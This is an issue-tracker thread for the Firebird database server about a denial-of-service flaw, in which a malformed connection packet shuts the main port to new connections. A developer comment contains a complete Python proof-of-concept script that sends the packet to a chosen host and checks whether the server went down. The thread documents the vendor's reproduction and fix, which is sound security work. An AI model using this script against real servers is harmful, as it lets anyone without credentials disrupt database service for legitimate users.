Possible DoS attack using the malformed packet sent into the connection port [CORE2563] #2973

Closed
firebird-automations opened this issue Jul 20, 2009 · 11 comments

Comments

@firebird-automations
Collaborator

Submitted by: @dyemanov

It's possible to shut down the server's main port (3050 by default) by sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

Commits: 0964cde 01fbf3c a095a41 d6c79a4

@firebird-automations
Collaborator Author

Modified by: @dyemanov

assignee: Dmitry Yemanov [ dimitr ]

@firebird-automations
Collaborator Author

Modified by: @dyemanov

status: Open [ 1 ] => In Progress [ 3 ]

@firebird-automations
Collaborator Author

Commented by: @dyemanov

This is the restricted (developers only) comment which contains a Python script reproducing the issue.

```python
# Python 2 script as posted (print statement, str payload).
import socket
import time

def attack(host, port):
    op_connect_request = '\x35'  # Request to establish connection

    # 4-byte big-endian opcode (0x00000035 = op_connect_request) followed by filler
    packet  = '\x00\x00\x00' + op_connect_request
    packet += "A" * 12  # Invalid data, must be >= 12 bytes in order to trigger the DoS

    print "(+) Connecting to the server...."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "(+) Sending op_connect_request packet..."
    s.send(str(packet))
    s.close()
    print "(+) op_connect_request packet successfully sent."

    # Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
    print "(+) Waiting 10 seconds before trying to reconnect to the server..."
    time.sleep(10)

    try:
        print "(+) Trying to reconnect..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print "(!) Something went wrong. The server is still alive."
    except socket.error:
        print "(*) Attack successful. The server is down."

port = 3050
host = '127.0.0.1'  # Replace with your target host
attack(host, port)
```

@firebird-automations
Collaborator Author

Modified by: @dyemanov

description: It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jun-2009 by Core Security Technologies. => It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

@firebird-automations
Collaborator Author

Modified by: @dyemanov

status: In Progress [ 3 ] => In Progress [ 3 ]

Fix Version: 2.1.3 [ 10302 ]

Fix Version: 2.5 Beta 2 [ 10300 ]

Fix Version: 1.5.6 [ 10225 ]

Fix Version: 2.0.6 [ 10303 ]

@firebird-automations
Collaborator Author

Modified by: @dyemanov

status: In Progress [ 3 ] => Open [ 1 ]

@firebird-automations
Collaborator Author

Modified by: @dyemanov

security: Developers [ 10012 ] =>

@firebird-automations
Collaborator Author

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

@firebird-automations
Collaborator Author

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-automations
Collaborator Author

Modified by: @pavel-zotov

QA Status: No test

@firebird-automations
Collaborator Author

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Not enough information
